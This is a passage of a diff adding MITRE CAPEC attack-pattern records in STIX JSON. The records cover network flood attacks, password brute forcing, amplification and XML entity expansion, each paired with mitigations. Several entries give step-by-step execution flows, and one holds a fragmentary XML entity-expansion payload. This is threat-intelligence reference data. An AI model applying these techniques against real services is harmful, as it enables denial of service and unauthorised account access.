Additionally, due to the session-less nature of the UDP protocol, the source of a packet is easily spoofed making it difficult to find the source of the attack.", + "external_references": [ + { + "external_id": "CAPEC-486", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/486.html" + }, + { + "external_id": "CWE-770", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/770.html" + } + ], + "id": "attack-pattern--bb4d350b-c500-45d6-97c2-c0adccbe6bad", + "modified": "2022-09-29T00:00:00.000Z", + "name": "UDP Flood", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--6854fe89-0829-429f-a95c-89e77ab6c8ed" + ], + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_prerequisites": [ + "This type of an attack requires the ability to generate a large amount of UDP traffic to send to the desired port of a target service using UDP." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "To mitigate this type of an attack, modern firewalls drop UDP traffic destined for closed ports, and unsolicited UDP reply packets. 
A variety of other countermeasures such as universal reverse path forwarding and remote triggered black holing(RFC3704) along with modifications to BGP like black hole routing and sinkhole routing(RFC3882) help mitigate the spoofed source IP nature of these attacks.", + "id": "course-of-action--7547eca0-e697-4517-a5ea-a7cf9a8da506", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-486-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d51664cd-4d4a-4d9d-a633-187820aacb6a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7547eca0-e697-4517-a5ea-a7cf9a8da506", + "spec_version": "2.1", + "target_ref": "attack-pattern--bb4d350b-c500-45d6-97c2-c0adccbe6bad", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary may execute a flooding attack using the ICMP protocol with the intent to deny legitimate users access to a service by consuming the available network bandwidth. A typical attack involves a victim server receiving ICMP packets at a high rate from a wide range of source addresses. 
Additionally, due to the session-less nature of the ICMP protocol, the source of a packet is easily spoofed making it difficult to find the source of the attack.", + "external_references": [ + { + "external_id": "CAPEC-487", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/487.html" + }, + { + "external_id": "CWE-770", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/770.html" + } + ], + "id": "attack-pattern--2e017307-7bab-419b-972c-8dae9e089572", + "modified": "2022-09-29T00:00:00.000Z", + "name": "ICMP Flood", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--6854fe89-0829-429f-a95c-89e77ab6c8ed" + ], + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_prerequisites": [ + "This type of an attack requires the ability to generate a large amount of ICMP traffic to send to the target server." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "To mitigate this type of an attack, an organization can enable ingress filtering. 
Additionally modifications to BGP like black hole routing and sinkhole routing(RFC3882) help mitigate the spoofed source IP nature of these attacks.", + "id": "course-of-action--fb127f46-6f57-4569-b6c8-e5ae71cdaee4", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-487-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--aec19b04-5aac-4130-b0dc-e5bb2841bab7", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--fb127f46-6f57-4569-b6c8-e5ae71cdaee4", + "spec_version": "2.1", + "target_ref": "attack-pattern--2e017307-7bab-419b-972c-8dae9e089572", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary may execute a flooding attack using the HTTP protocol with the intent to deny legitimate users access to a service by consuming resources at the application layer such as web services and their infrastructure. These attacks use legitimate session-based HTTP GET requests designed to consume large amounts of a server's resources. 
Since these are legitimate sessions this attack is very difficult to detect.", + "external_references": [ + { + "external_id": "CAPEC-488", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/488.html" + }, + { + "external_id": "CWE-770", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/770.html" + }, + { + "description": "Endpoint Denial of Service:Service Exhaustion Flood", + "external_id": "T1499.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1499/002" + }, + { + "description": "HTTP Flood Attack", + "external_id": "REF-751", + "source_name": "reference_from_CAPEC", + "url": "https://www.cloudflare.com/learning/ddos/http-flood-ddos-attack/" + } + ], + "id": "attack-pattern--d43c7ffa-16a5-4eb9-8c29-3391cc7ff269", + "modified": "2023-01-24T00:00:00.000Z", + "name": "HTTP Flood", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--6854fe89-0829-429f-a95c-89e77ab6c8ed" + ], + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_prerequisites": [ + "This type of an attack requires the ability to generate a large amount of HTTP traffic to send to a target server." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Use a Web Application Firewall (WAF) to help filter out malicious traffic. This can be setup with rules to block IP addresses found in IP reputation databases, which contains lists of known bad IP addresses. Analysts should also monitor when the traffic flow becomes abnormally large, and be able to add on-the-fly rules to block malicious traffic. 
Special care should be taken to ensure low false positive rates in block rules and functionality should be implemented to allow a legitimate user to resume sending traffic if they have been blocked.", + "id": "course-of-action--2b7572ea-6dc7-4734-810a-1dd9611f435e", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-488-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ed0e71de-8def-40f3-9a63-1cdcb946c954", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2b7572ea-6dc7-4734-810a-1dd9611f435e", + "spec_version": "2.1", + "target_ref": "attack-pattern--d43c7ffa-16a5-4eb9-8c29-3391cc7ff269", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Hire a third party provider to implement a Web Application Firewall (WAF) for your application. 
Third party providers have dedicated resources and expertise that could allow them to update rules and prevent HTTP Floods very quickly.", + "id": "course-of-action--e513ee65-a2f8-450c-8b8c-3d133d7b5876", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-488-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a45db50b-73a2-4ce7-a16f-701e36124c60", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e513ee65-a2f8-450c-8b8c-3d133d7b5876", + "spec_version": "2.1", + "target_ref": "attack-pattern--d43c7ffa-16a5-4eb9-8c29-3391cc7ff269", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Use a load balancer such as nginx to prevent small scale HTTP Floods by dispersing traffic between a group of servers.", + "id": "course-of-action--a7612a56-a6bc-4802-9430-8ca1c92a4a02", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-488-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--cb4fc921-8f0d-4d6a-b61e-55f683bc0a9c", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": 
"course-of-action--a7612a56-a6bc-4802-9430-8ca1c92a4a02", + "spec_version": "2.1", + "target_ref": "attack-pattern--d43c7ffa-16a5-4eb9-8c29-3391cc7ff269", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Make a requesting machine solve some kind of challenge before allowing them to send an HTTP request. This could be a captcha or something similar that works to deter bots.", + "id": "course-of-action--49f16706-cef6-476c-902e-ca7d425a38d8", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-488-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--04107b1a-930b-4176-95d0-e7209880a9b9", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--49f16706-cef6-476c-902e-ca7d425a38d8", + "spec_version": "2.1", + "target_ref": "attack-pattern--d43c7ffa-16a5-4eb9-8c29-3391cc7ff269", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary may execute a flooding attack using the SSL protocol with the intent to deny legitimate users access to a service by consuming all the available resources on the server side. These attacks take advantage of the asymmetric relationship between the processing power used by the client and the processing power used by the server to create a secure connection. 
In this manner the attacker can make a large number of HTTPS requests on a low provisioned machine to tie up a disproportionately large number of resources on the server. The clients then continue to keep renegotiating the SSL connection. When multiplied by a large number of attacking machines, this attack can result in a crash or loss of service to legitimate users.", + "external_references": [ + { + "external_id": "CAPEC-489", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/489.html" + }, + { + "external_id": "CWE-770", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/770.html" + }, + { + "description": "Endpoint Denial of Service:Service Exhaustion Flood", + "external_id": "T1499.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1499/002" + } + ], + "id": "attack-pattern--f30a7c37-4d87-41d2-a103-c995948076f3", + "modified": "2022-09-29T00:00:00.000Z", + "name": "SSL Flood", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--6854fe89-0829-429f-a95c-89e77ab6c8ed" + ], + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_prerequisites": [ + "This type of an attack requires the ability to generate a large amount of SSL traffic to send a target server." 
+ ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "To mitigate this type of an attack, an organization can create rule based filters to silently drop connections if too many are attempted in a certain time period.", + "id": "course-of-action--6d85f1a8-2ea9-4b71-946c-770993335e06", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-489-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--63e515c5-ea52-4e4c-947f-ddf3f6b91725", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--6d85f1a8-2ea9-4b71-946c-770993335e06", + "spec_version": "2.1", + "target_ref": "attack-pattern--f30a7c37-4d87-41d2-a103-c995948076f3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary tries every possible value for a password until they succeed. A brute force attack, if feasible computationally, will always be successful because it will essentially go through all possible passwords given the alphabet used (lower case letters, upper case letters, numbers, symbols, etc.) 
and the maximum length of the password.", + "external_references": [ + { + "external_id": "CAPEC-49", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/49.html" + }, + { + "external_id": "CWE-521", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/521.html" + }, + { + "external_id": "CWE-262", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/262.html" + }, + { + "external_id": "CWE-263", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/263.html" + }, + { + "external_id": "CWE-257", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/257.html" + }, + { + "external_id": "CWE-654", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/654.html" + }, + { + "external_id": "CWE-307", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/307.html" + }, + { + "external_id": "CWE-308", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/308.html" + }, + { + "external_id": "CWE-309", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/309.html" + }, + { + "description": "Brute Force:Password Guessing", + "external_id": "T1110.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1110/001" + } + ], + "id": "attack-pattern--8d88a81c-bde9-4fb3-acbe-901c783d6427", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Password Brute Forcing", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_precede_refs": [ + "attack-pattern--03a731ef-751b-43de-9159-9667d4be4d1a", + "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b", + "attack-pattern--886a7175-e28a-4e6d-bd22-3b1497e31dc7", + "attack-pattern--f2654def-b86d-4ddb-888f-de6b50a103a2", + "attack-pattern--2618d0a4-06d0-4bde-8271-2df61ed8297a" + ], + 
"x_capec_child_of_refs": [ + "attack-pattern--7b423196-9de6-400f-91de-a1f26b3f19f1" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n A system does not enforce a strong password policy and the user picks a five letter password consisting of lower case English letters only. The system does not implement any password throttling mechanism. Assuming the adversary does not know the length of the users' password, an adversary can brute force this password in maximum 1+26+26^2+26^3+26^4+26^5 = 1 + 26 + 676 + 17576 + 456976 + 11,881,376 = 12,356,631 attempts, and half these tries (6,178,316) on average. Using modern hardware this attack is trivial. If the adversary were to assume that the user password could also contain upper case letters (and it was case sensitive) and/or numbers, than the number of trials would have been larger.\n An adversary's job would have most likely been even easier because many users who choose easy to brute force passwords like this are also likely to use a word that can be found in the dictionary. Since there are far fewer valid English words containing up to five letters than 12,356,631, an attack that tries each of the entries in the English dictionary would go even faster.\n ", + "A weakness exists in the automatic password generation routine of Mailman prior to 2.1.5 that causes only about five million different passwords to be generated. This makes it easy to brute force the password for all users who decided to let Mailman automatically generate their passwords for them. Users who chose their own passwords during the sign up process would not have been affected (assuming that they chose strong passwords). See also: CVE-2004-1143" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine application's/system's password policy: Determine the password policies of the target application/system.

  2. Techniques
    Determine minimum and maximum allowed password lengths.
    Determine format of allowed passwords (whether they are required or allowed to contain numbers, special characters, etc.).
    Determine account lockout policy (a strict account lockout policy will prevent brute force attacks).

Exploit

  1. Brute force password: Given the finite space of possible passwords dictated by the password policy determined in the previous step, try all possible passwords for a known user ID until application/system grants access.

  2. Techniques
    Manually or automatically enter all possible passwords through the application/system's interface. In most systems, start with the shortest and simplest possible passwords, because most users tend to select such passwords if allowed to do so.
    Perform an offline dictionary attack or a rainbow table attack against a known password hash.
", + "x_capec_extended_description": "\n A system will be particularly vulnerable to this type of an attack if it does not have a proper enforcement mechanism in place to ensure that passwords selected by users are strong passwords that comply with an adequate password policy. In practice a pure brute force attack on passwords is rarely used, unless the password is suspected to be weak. Other password cracking methods exist that are far more effective (e.g. dictionary attacks, rainbow tables, etc.). Knowing the password policy on the system can make a brute force attack more efficient. For instance, if the policy states that all passwords must be of a certain level, there is no need to check smaller candidates.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--a9dc4914-409a-4f71-80df-c5cc3923d112", + "attack-pattern--a390cb72-b4de-4750-ae05-be556c89f4be", + "attack-pattern--f724f0f3-20e6-450c-be4a-f373ea08834d", + "attack-pattern--8c7bab16-5ecd-4778-9b04-c185bceed170" + ], + "x_capec_prerequisites": [ + "An adversary needs to know a username to target.", + "The system uses password based authentication as the one factor authentication mechanism.", + "An application does not have a password throttling mechanism in place. A good password throttling mechanism will make it almost impossible computationally to brute force a password as it may either lock out the user after a certain number of incorrect attempts or introduce time out periods. Both of these would make a brute force attack impractical." + ], + "x_capec_resources_required": [ + "A powerful enough computer for the job with sufficient CPU, RAM and HD. Exact requirements will depend on the size of the brute force job and the time requirement for completion. Some brute forcing jobs may require grid or distributed computing (e.g. DES Challenge)." + ], + "x_capec_skills_required": { + "Low": "A brute force attack is very straightforward. 
A variety of password cracking tools are widely available." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implement a password throttling mechanism. This mechanism should take into account both the IP address and the log in name of the user.", + "id": "course-of-action--1260aa3b-67cb-4194-9b7c-1edcd9cea382", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-49-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a2efb506-562c-41e5-afef-c5f89f5bf4ab", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--1260aa3b-67cb-4194-9b7c-1edcd9cea382", + "spec_version": "2.1", + "target_ref": "attack-pattern--8d88a81c-bde9-4fb3-acbe-901c783d6427", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Put together a strong password policy and make sure that all user created passwords comply with it. 
Alternatively automatically generate strong passwords for users.", + "id": "course-of-action--67382257-6794-48ac-82a0-f33260b6f0db", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-49-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c0f08626-b782-458e-bf5e-36ceaf04f850", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--67382257-6794-48ac-82a0-f33260b6f0db", + "spec_version": "2.1", + "target_ref": "attack-pattern--8d88a81c-bde9-4fb3-acbe-901c783d6427", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Passwords need to be recycled to prevent aging, that is every once in a while a new password must be chosen.", + "id": "course-of-action--bb36d937-986b-43eb-aa65-3e773af8ce32", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-49-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fb2ec194-be12-4cc9-8d13-70492fffaff4", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--bb36d937-986b-43eb-aa65-3e773af8ce32", + "spec_version": "2.1", + "target_ref": 
"attack-pattern--8d88a81c-bde9-4fb3-acbe-901c783d6427", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary may execute an amplification where the size of a response is far greater than that of the request that generates it. The goal of this attack is to use a relatively few resources to create a large amount of traffic against a target server. To execute this attack, an adversary send a request to a 3rd party service, spoofing the source address to be that of the target server. The larger response that is generated by the 3rd party service is then sent to the target server. By sending a large number of initial requests, the adversary can generate a tremendous amount of traffic directed at the target. The greater the discrepancy in size between the initial request and the final payload delivered to the target increased the effectiveness of this attack.", + "external_references": [ + { + "external_id": "CAPEC-490", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/490.html" + }, + { + "external_id": "CWE-770", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/770.html" + }, + { + "description": "Network Denial of Service:Reflection Amplification", + "external_id": "T1498.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1498/002" + } + ], + "id": "attack-pattern--e68b5623-7a7a-45f8-896f-12b38bedc838", + "modified": "2020-07-30T00:00:00.000Z", + "name": "Amplification", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--6854fe89-0829-429f-a95c-89e77ab6c8ed" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_prerequisites": [ + "This type of an attack 
requires the existence of a 3rd party service that generates a response that is significantly larger than the request that triggers it." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "To mitigate this type of an attack, an organization can attempt to identify the 3rd party services being used in an active attack and blocking them until the attack ends. This can be accomplished by filtering traffic for suspicious message patterns such as a spike in traffic where each response contains the same large block of data. Care should be taken to prevent false positive rates so legitimate traffic isn't blocked.", + "id": "course-of-action--d0ed5ae3-a632-40b6-adec-abee22f9f753", + "modified": "2020-07-30T00:00:00.000Z", + "name": "coa-490-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f777f7b6-4f71-48a6-89b5-694f5210cb6b", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d0ed5ae3-a632-40b6-adec-abee22f9f753", + "spec_version": "2.1", + "target_ref": "attack-pattern--e68b5623-7a7a-45f8-896f-12b38bedc838", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits macro-like substitution to cause a denial of service situation due to excessive memory being allocated to fully expand the data. 
The result of this denial of service could cause the application to freeze or crash. This involves defining a very large entity and using it multiple times in a single entity substitution. CAPEC-197 is a similar attack pattern, but it is easier to discover and defend against. This attack pattern does not perform multi-level substitution and therefore does not obviously appear to consume extensive resources.", + "external_references": [ + { + "external_id": "CAPEC-491", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/491.html" + }, + { + "external_id": "CWE-770", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/770.html" + } + ], + "id": "attack-pattern--8f70b1fb-393f-4494-b4ad-67f1a2107975", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Quadratic Data Expansion", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_alternate_terms": [ + "XML Entity Expansion (XEE)" + ], + "x_capec_can_follow_refs": [ + "attack-pattern--5cf3eacf-a0c6-4c59-9f97-4f677a90587a" + ], + "x_capec_child_of_refs": [ + "attack-pattern--8abd01d1-b2a2-4b86-a640-7d3d3b61d27f" + ], + "x_capec_consequences": { + "Availability": [ + "Unreliable Execution (Denial of Service)", + "Resource Consumption (Denial of Service)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n In this example the attacker defines one large entity and refers to it many times.\n ... [100K of them] ...AAAA\">]>&x;&x;... [100K of them]...&x;&x;\n This results in a relatively small message of 100KBs that will expand to a message in the GB range.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the target: An adversary determines the input data stream that is being processed by a data parser that supports using substituion on the victim's side.

  2. Techniques
    Use an automated tool to record all instances of URLs to process requests.
    Use a browser to manually explore the website and analyze how the application processes requests.

Exploit

  1. Craft malicious payload: The adversary crafts malicious message containing nested quadratic expansion that completely uses up available server resource.

  2. Send the message: Send the malicious crafted message to the target URL.

